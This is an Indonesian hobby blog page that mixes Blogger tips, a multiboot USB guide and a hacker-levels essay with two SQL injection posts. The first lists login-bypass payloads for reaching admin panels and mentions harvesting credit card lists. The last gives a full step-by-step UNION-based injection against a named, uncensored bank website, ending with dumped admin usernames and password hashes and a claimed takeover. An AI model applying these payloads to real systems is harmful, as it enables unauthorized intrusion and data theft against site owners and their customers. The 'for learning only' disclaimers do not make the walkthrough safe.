5) Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
7) Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password : ` or `a'='a
atau bisa dimasukkan ke dua–duanya misal :
‘ or 0=0 -- ; “ or 0=0 -- ; or 0=0 -- ; ‘ or 0=0 # ;
“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x
Cool Cobalah sampai berhasil hingga anda bisa masuk ke admin panel

Cara pencegahan SQL INJECTION
1) Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.


Hacking adalah seni. Hacking adalah perpaduan dari pengetahuan, kreatifitas dan kesabaran. Jika Anda memiliki ketiga-tiganya Anda akan berhasil.

R E F E R E N S I
1) -------------, SQLinjection, (www.BlackAngels.it).
2) -------------, Advanced SQL injection in SQL server applications, (www.ngssoftware.com).
3) -------------, SQL injection walktrough (www.securiteam.com).
4) BM-100, ”Hacking hiltonjakarta.com (SQL Injection)”, 24 Juli 2005, (http://www.jasakom.com).
5) Budi Raharjo, ”Keamanan Sistem Informasi Berbasis Internet”, PT Insan Indonesia & PT INDOCISC, Jakarta,2002.
6)
study
more »

CARA MEMBUAT ARTIKEL POSTINGAN TAMPIL HANYA JUDULNYA SAJA.

Diposting oleh blog TKJ

...Membuat tampilan artikel postingan di Halaman Utama Blog tampil Minimalis atau hanya terlihat Judul artikel saja


 ..Hal ini tampaknya menjadi trend juga pada beberapa tampilan blog... adminnya berusaha membuat tampilan blognya sesimple mungkin tapi berkualitas.. salah satunya modifikasi cuplikan artikel postingan diblog...

...Ada ragam cara untuk membuat tampilan cuplikan postingan artikel di blog Minimalis... tapi disini saya akan membahas trik yang saya gunakan untuk meminimalis tampilan postingan artikel sehingga tampak judulnya saja beserta atribut jumlah komentar, tgl posting, label, dsb....

Oke.. langsung saja simak caranya...mudah saja... langkah-langkahnya sbb :
 
1.  Login ke blogger > Rancangan > Edit HTML > Edit Template ( Centang Expand Template Widget ) ...tekan CTRL+F lalu cari " <data:post.title/> " ... jika sudah ketemu lalu tambahkan kode dibawah ini...
<div style='border: 0px solid rgb(250, 252, 252); margin: 10px 0px; padding: 10px; -moz-border-radius: 0px 0px 0px 0px; width: auto; height: auto; background-color: rgb(250, 252, 252); '>

dan..

</div>
Lakukan Persis seperti contoh dibawah ini... Perhatikan ya cara penempatannya...
<div style='border: 0px solid rgb(250, 252, 252); margin: 10px 0px; padding: 10px; -moz-border-radius: 0px 0px 0px 0px; width: auto; height: auto; background-color: rgb(250, 252, 252); '>
      <h3 class='post-title entry-title'>
     <b:if cond='data:post.link'>
       <a expr:href='data:post.link'><data:post.title/></a>
     <b:else/>
        <b:if cond='data:post.url'>
          <a expr:href='data:post.url'><data:post.title/></a>
        <b:else/>
          <data:post.title/>
        </b:if>
     </b:if>
      </h3>
</div>

    </b:if>
Ket :
background-color: rgb(250, 252, 252); = Warna Background-nya bisa kamu ubah sesuai keinginan .. >> cek warna disini  

..Jika sudah benar... Simpanlah template-nya..

TRik ini akan membuat Judul artikel postingan seperti gambar dibawah ini...


2. Beralih ke Rancangan > Elemen Halaman > Klik Edit pada Posting bLog.. Lalu aturlah seperti gambar di bawah ini.. atau aturlah seperti kemauan kalian sendiri...


3. Saya pakai editor entri baru dari blogger ( Cek editor kamu di Pengaturan > Dasar > Setting Global > Editor Entri > Pilih option Editor yang diperbarui..) lalu pada awal postingan (tambahkan) klik Insert Jump Break, baru setelahnya isilah dengan postingan kita... Simple kan.. :)

4. Selesai... Terbitkanlah postingan... dan lihat hasilnya pada Halaman Utama Blogmu...

....tapi kalo terlalu minimalis malah aneh ya :D ....

more »

MERUBAH BLOG MENJADI WEBSITE

Diposting oleh blog TKJ
DISINI SAYA ININ MENCOBA TRICK UNTUK MERUBAH BLOG MENJADI WEBSITE.. ikuti dengan baik... semoga bermanfaat..... 1. Loginlah dulu di blogger ..pada dasbor buatlah blog baru.. buat nama tampilan & nama URL blogspot-nya.. jika sudah pilih saja tema blog sesukamu.. & blog yang baru pun jadi.. di sini saya buat Blog baru dengan nama " ecak2nyo.blogspot.com " 2. Browsing ke www.freedomain.co.nr 3. Isi nama website yang kamu inginkan di bagian " Check if your Free CO.NR Domain Name is still available ".. seperti contoh ini.. Lalu kLik tombol Check!.. jika Nama Domain-nya masih tersedia maka akan muncul konfirmasi seperti ini... di bagian bawah halaman Congratulations! The Domain is still available! .. kLik tombol " I want to Signup for this Domain ".. 3. Maka kamu akan menemui halaman English language test ini.. isilah pertanyaannya dengan benar..lalu kLik Next Step .... 4. Jika pertanyaan seperti contoh di atas terjawab dengan benar...kamu menemui halaman Please study our Basic Free Domain Name Rules Carefully.. Scrolling-lah kebawah.. dan Centang.. kemudian kLik I have read and I Agree !.. 5. Maka akan ada halaman Basic CO.NR Free Domain Name account signup: step 2.. dan isi juga form dibawahnya.. ini yang penting !!! Jangan sampai salah memasukan URL blogspot yang baru kamu buat tadi.. jika sudah di isi dengan benar ( di check lagi yaa ).. lalu kLik Next Step.. 6. kemudian Kamu akan menemui halaman Basic CO.NR Free Domain account signup: step 3.. Isilah form ini dengan benar.. lalu kLik lagi Next Step .. 7. Jika sukses maka kamu akan menemui halaman Basic CO.NR Free Domain account signup: Final step ... Lalu kLik Complete ... dan akan ada halaman Basic CO.NR Free Domain account signup: Registered ... 8. LOginlah ke Email kamu... cari Email konfirmasi dari www.FreeDomain.CO.NR.. Periksa juga di Junk Email atau kotak Spam email kamu.. scrolling ke bawah cari yang seperti ini.. ada kode Aktivasi-nya.. 9. kLik lah URL aktivasi nya..maka akan kamu jumpai halaman ini.. Isilah Password dan copy-paste kode Aktivasi dari Email konfirmasi tadi.. Lalu kLik tombol Activate! ... maka halaman ini yang akan muncul.. Basic Free Domain name: ecak2nyo.co.nr - Activated ... 10. Testing Website Domain CO.NR kamu yang baru.. di Browser MoziLLa saya ketikan URL website www.ecak2nyo.co.nr.. dan Eng Ing Eng.. ManTaaaB .. Jadilah Website kamu tampil dengan nama baru.. Lihatlah gambar dibawah nama URL Blognya sudah berubah.. atau KLik Link ini www.ecak2nyo.co.nr.. Selesai Note : kamu bisa Login ke FreeDomain CO.NR dan mengedit data-data yang telah kamu isikan sebelumnya.. MySpace ...SeLaMat MenCoba... more »

multboot dengan Hiren’s BootCD

Diposting oleh blog TKJ
Hiren’s BootCD + XP + Win7/Vista Dlm Satu Flash Disk by SOFTWARE ENGENERING Keperluan multboot buat user PC mmg sangat banyak membantu, utk menggabungkannya kedlm USB flash mmg butuh cara khusus. Utk menggabung Hiren’s BootCD, Windows XP, & Windows Vista/7 dlm satu flash disk, ikuti cara berikut:Yang perlu disiapkan: 1. Hiren’s BootCD (disarankan versi 9.7 keatas) 2. CD Installer Windows XP (rekomendasi SP3) 3. DVD Installer Windows Vista/Windows7 4. USB_MultiBoot_10 5. GRUB4DOS Langkah-langkahnya: Untuk toolnya bisa download disini : usb multi boot 10 Grub4dos Integrasi Windows XP Ektsrak USB MultiBoot 10 ke hardisk (mis di C:\USB_MultiBoot_10\). Masukkan CD Windows XP kedalam CD/DVD drive atau mount dengan PowerISO atau DaemonTools. Colokkan FD USB kemudian dari dalam folder USB_MultiBoot_10, jalankan file USB_MultiBoot_10.cmd. Akan muncul jendela prompt Windows, tekan sembarang tombol untuk mulai (Press any key to continue…). Berikutnya adalah memformat flash disk USB. Ada 2 tool yg disediakan untuk memformat flash disk anda: PeToUSB : flash disk masimal 2GB, dgn system file FAT. HP USB Disk Storage Format Tool : Flash disk diatas 2GB dgn system file FAT & NTFS. Pilih jenis tool utk format FD-nya (saya pake HP USB Disk Storage) lalu tekan tombol “H” & tekan ENTER. Pastikan nama Flash disk USB sdh tertera pada kotak Device HP USB Disk Storage Format dan pilih system file NTFS supaya proses instalasi dari FD jauh lebih cepat. Kalau sudah siap, tekan tombol Start. Tekan tombol Yes untuk pertanyaan message-box dari tool HP USB. Kalau proses format sudah selesai, klik tombol “Close”dan anda akan diantar ke jendela berikut: Tekan angka “1” pada keyboard lalu tekan ENTER. Pilih lokasi drive Windows XP. Klik tombol Yes pada kotak Unattended Install ? – XP Setup UserData in winnt.sif and $OEM$yg muncul. Selanjutnya silakan isi informasi nama user, organisasi, product key XP, nama komputer, password, dsb sama seperti melakukan instalasi normal dari CD installer XP. Jadi, nanti tidak perlu lagi mengisi data2 instalasi saat menginstal XP dari Flash disk. Selanjutnya tekan angka “2” lalu ENTER. Pilih lokasi drive FD. Ketik angka “3” lalu tekan ENTER untuk mulai menyalin file2 instalasi XP kedalam FD. Baca kotak2 pertanyaan yg muncul dan iyakan saja. Tahap pembuatan instalasi XP USB sudah selesai, tekan “Q” untuk menutup USB_MultiBoot_10.cmd. Integrasi Hiren’s BootCD Masukkan/mount CD/ISO Hiren’s dalam drive CD/DVD-ROM. Copy folder HBCD dan file autorun.infdari dalam drive Hiren’s BootCD kedalam FD. Ekstrak file grub4dos.zip yang sudah didownload, kemudian copy file gldr dan file menu.lstdari hasil ekstraksi tsb kedalam FD. Sekarang, FD USB multiboot sdh jadi dengan Windows XP dan Hiren’s BootCD didalamnya. Tinggal mengatur BIOS PC/laptop supaya bisa booting dari USB FD. Integrasi Windows 7/VistaCopy semua isi DVD Windows 7/Vista kedalam FD. Buka file menu.lstdalam FD dengan notepad lalu tambahkan baris berikut didalamnya: Code: title Windows 7 root (hd0,0) chainloader /bootmgr Selesai!! Special thanks for narcophilia for this tutorial info. posting binus hacker more »

MENGENAL TINGKATAN HACKER

Diposting oleh blog TKJ
Terima kasih telah berkunjung ke blog saya,maaf untuk ketidak nyamanannya karena blog dalam masa pembangunan. mohon dukungan dan motivasinya ya.... ^_^, salam:solin. Adsense Indonesia ads Internet Marketing - Online ads ads mengenal tingkatan tentang hacker  |Label: hacker study Bookmark and Share Dalam dunia kita (hacker) terdapat tingkat/level. Seorang hacker akan melalui tahapan tahapan untuk menjadi sempurna. Tahapan tersebut ialah: 1. Mundane Person Tingkatan paling bawah. Seseorang pada tingkatan ini pada dasarnya tidak tahu sama sekali tentang hacker dan cara-caranya, walaupun ia mungkin memiliki komputer sendiri dan akses Internet. Ia hanya tahu bahwa yang namanya hacker itu membobol sistem komputer dan melakukan hal-hal yang negatif (tindak kejahatan). Padahal sebenarnya hacker bukan seperti itu, kecuali hacker tidak taat e-tik 2. Lamer Seseorang pada tingkatan ini masih dibingungkan oleh seluk beluk hacking karena ia berpikir bahwa melakukan hacking sama seperti cara-cara waras (dalam dunia underground berarti menggandakan perangkat lunak secara ilegal). Pengetahuannya tentang hal-hal seperti itu masih minim, tapi sudah mencoba belajar. Seseorang pada tingkatan ini sudah bisa mengirimkan trojan (yang dibuat orang lain) ke atau pada komputer orang lain ketika melakukan obrolan pada IRC atau ICQ dan menghapus file-file mereka. Padahal ia sendiri tidak tahu persis bagaimana trojan bekerja. Seseorang yang sukses menjadi hacker biasanya bisa melalui tahapan ini dengan cepat bahkan melompatinya. 3. Wannabe Pada tingkatan ini seseorang sudah mengetahui bahwa melakukan tindakan hack itu lebih dari sekedar menerobos masuk ke komputer orang lain. Ia lebih menganggap hal tersebut sebagai sebuah filsafat atau way of life. Akhirnya ia jadi ingin tahu lebih banyak lagi. Ia mulai mencari, membaca dan mempelajari tentang metode-metode hacking dari berbagai sumber. 4. Newbie Pada tingkatan ini ia sudah memiliki dasar-dasar teknik hacking. Ia akan mencoba menerobos masuk ke sistem orang lain hanya untuk mencoba apa yang sudah ia pelajari. Meskipun demikian, pada tingkatan ini ia mengerti bahwa ketika melakukan hacking ia tidak harus merusak sistem atau menghapus apa saja jika hal itu tidak diperlukan untuk menutupi jejaknya. 5. Hacker Sebenarnya sulit untuk mengatakan tingkatan akhir atau final dari hacker telah tercapai, karena selalu saja ada sesuatu yang baru untuk dipelajari atau ditemukan (mengumpulkan informasi dan mempelajarinya dengan cermat merupakan dasar-dasar yang sama bagi seorang hacker) dan hal tersebut juga tergantung perasaan (feeling). Meskipun demikian, menjadi seorang hacker memang lebih menjurus pada hal pemikiran. Hacker yang tidak taat pada etik akan menjadi: Dark-side Hacker Seorang Dark-side hacker sama seperti Darth Vader (tokoh dalam film Star Wars) yang tertarik dengan kekuatan kegelapan. Hal ini tidak ada hubungannya dengan masalah “baik” atau “jahat” tapi lebih kepada masalah “sah (sesuai hukum yang berlaku)” dan “kekacauan”. Seorang Dark-side hacker punya kemampuan yang sama dengan semua hacker, tapi “sisi gelap” dari pikirannya membuat ia menjadi unsur berbahaya. sooo.... nilailah diri kalian sendiri dan gunakanlah kemampuanmu untuk hal-hal positif. ngomong2 niiiii yeeee.....artikel ini saya sunting dari salah satu forum yang saya ikuti. semoga bermafaat hanya sebuah infomasi, dah hargailah informasi seperti kala kau menggunakannya. more »

Hack Website menggunakan SQL injection

Diposting oleh blog TKJ
Hai teman teman berikut ini adalah cara Web attack (hack website) menggunakan cara SQL injection. Ok langsung saja bisa kamu lihat di bawah ini :

1. Menemukan target

Kita dapat menemukan calon korban dengan bantuan search engine (Google masih yang terbaik) dengan memanfaatkan pola-pola tertentu. Pola-pola inilah yang disebut dengan Dork. Dork yang kita gunakan adalah untuk mencari pola yang berhubungan dengan SQL (Database) maka dork ini sering juga disebut dengan SQL Dork.

N0LDR
“Hal di atas merupakan alasan kuat bagi Admin untuk selalu update dengan isu keamanan karena kita bias saja menjadi korban walaupun kita tidak memiliki musuh. Dengan masuk ke daftar hasil pencarian maka kita telah menjadi calon korban”

Perlu diketahui, dengan dork yang sama belum tentu kita mendapatkan calon korban yang sama ! Untuk tutorial ini, saya menggunakan Dork (Google bisa lebih banyak memberikan SQL Dork kepada anda dari pada diri saya sendiri ):

Dork-Dork bisa kamu lihat disini Kumpulan Dork SQL Injection Update 2010

Dari sekian banyak calon korban, maka:
http://www.bankpapua.com/kantor.php?jenis=2
merupakan target saya pada tutorial sederhana ini.

N0LDR
“Target sengaja tidak saya sensor agar PoC (Proof of Concept) pada tutorial ini jelas. Kepada para pembaca saya harapkan untuk tidak melakukan tindakan pengerusakan di kemudain hari pada web site ini. Ingat, dengan melakukan pengerusakan berarti anda membunuh karier terhormat anda di masa depan. Pergunakanlah sebatas pembelajaran”


2. Mencari celah kelemahan

Pengujian apakah calon korban memiliki kelemahan SQL atau tidak. Kita dapat menambahkan karakter minus (-) atau petik tunggal (‘) [tergantung pada sistem (- atau ‘)]pada query yang ada. Jika kita mendapatkan error berarti calon korban memiliki kelemahan terlepas dari bisa di injeksi lebih lanjut atau tidak.

(-) ditambahkan sebelum item pada query seperti berikut:
http://www.bankpapua.com/kantor.php?jenis=-2
(‘) ditambahkan sesudah item pada query seperti berikut:
http://www.bankpapua.com/kantor.php?jenis=2’

Pada tutorial ini, teknik kedua yang memunculkan error! (berarti web site target memiliki kelemahan SQL Injection. Error yang kita dapatkan adalah:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/sloki/user/u8543b/sites/bankpapua.com/www/kantor.php on line 118


3. Mendapatkan jumlah kolom

Tahap selanjutnya adalah mendapatkan jumlah kolom pada tabel aktif. Tekniknya adalah dengan menggunkan perintah order by sebagai berikut:

http://www.bankpapua.com/kantor.php?jenis=2+order+by+1--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+2--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+3--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+4--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+5--
.
.
.
Kita lakukan pengujian satu persatu (boleh dilompat) hingga kita mendapatkan error yang berarti jumlah kolom terakhir (yang tidak error) merupakan jumlah kolom pada tabel aktif. Pada tutorial ini, kita mendapatkan error pada pengujian ke-6.

http://www.bankpapua.com/kantor.php?jenis=2+order+by+6--

Kita mendapatkan error:


Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/sloki/user/u8543b/sites/bankpapua.com/www/kantor.php on line 118

Berarti jumlah kolom pada tabel aktif adalah 5 (pengujian terakhir yang tidak error)


4. Mendapatkan angka keberuntungan

Angka keberuntungan adalah angka yang dimunculkan oleh sistem yaitu angka antara range jumlah kolom aktif (dalam kasus ini 1-5). Perintah yang kita gunakan adalah union select sebagai berikut:


http://www.bankpapua.com/kantor.php?...C2%2C3%2C4%2C5--

[Jangan lupa menambahkan karakter minus (-) pada awal key (pada kasus kita, key adalah 2)]. Kita mendapatkan angka 1,2,3, dan 4. Di angka-angka inilah tempat kita melakukan query.


5. Mendapatkan versi database server

Dapatkan versi server SQL (dalam kasus ini, MySQL) dengan perintah version(), atau @@version. Kita gunakan version() dan kita pilih angka 4:

http://www.bankpapua.com/kantor.php?...%2C3%2Cversion(),5--

Kita mendapatkan 5.0.51a-24+lenny4 yang berarti MySQL versi 5. Kita sedikit beruntung karena menemukan versi 5 jika versi 4 maka tahap berikutnya adalah “Tebak-tebak buah nanas”.


6. Mendapatkan nama tabel

Gunakan perintah group_concat(table_name) dengan penyeleksian dari information_schema.tables sebagai berikut:

http://www.bankpapua.com/kantor.php?...2Cgroup_concat(table_name),5+from+information_schema.tables+wher e+table_schema=database()--

Kita mendapatkan nama-nama tabel sebagai berikut:
adunasabah,agenda,anual,atm,atmprima,atmsama,berit a,birate,bunga,
galery,kantor,karir,kontak,konter,kurs,lapkeu,link ers,manajemen,pesertaquiz,
polling_d,polling_h,produk,promo,quiz_peserta,quiz _soal,regulasi,tamu,users. Dari sekian banyak kita pilih tabel users namun harus dikonversi ke heksadesimal terlebih dahulu. Silahkan kunjungi:

http://www.dolcevie.com/js/converter.html

kemudian kita mendapatkan (titik dua ( tidak diikutsertakan) users(ascii) -> 7573657273(hex)


7. Mendapatkan nama kolom

Gunakan perintah group_concat(column_name) dengan penyeleksian dari information_schema.columns sebagai berikut:

http://www.bankpapua.com/kantor.php?...2Cgroup_concat(column_name),5+from+information_schema.columns+wh ere+table_name=0x7573657273--

0x7573657273 kita dapatkan dengan menggabungkan 0x dengan 7573657273 (hasil konversi tadi). Kita mendapatkan nama-nama kolom sebagai berikut:
ids,username,password,fullname,address,a_add,a_edi t,a_del,topadmin,akses. Kita pilih username dan password.


8. Mendapatkan Data

Gunakan perintah group_concat(username,0x3a,password) dengan penyeleksian tabel users tadi sebagai berikut:

http://www.bankpapua.com/kantor.php?...2Cgroup_concat(username,0x3a,password),5+from+users--

Kita mendapatkan:

webmaster:    †¥²¯d”¥´¹¥¥¨±¬²»©¦£vttz
sdm:         †¥²¯d”¥´¹¥•¨±uvw
sekper:           †¥²¯d”¥´¹¥•©¯´©¶uvw

Terenkripsi   Tahap berikutnya adalah mendapatkan plain text dari password yang terenkripsi, google! Setelah dapat, cari halaman admin kemudian login dengan account webmaster, Anda telah berhasil take over http://www.bankpapua.com/

N0LDR
“Tutorial ini hanya sebagai pembelajaran semata. Hacking is good”
sumber : jasakom.com



more »

About Author

Foto Saya
banjarnegara, banjarnegara, Indonesia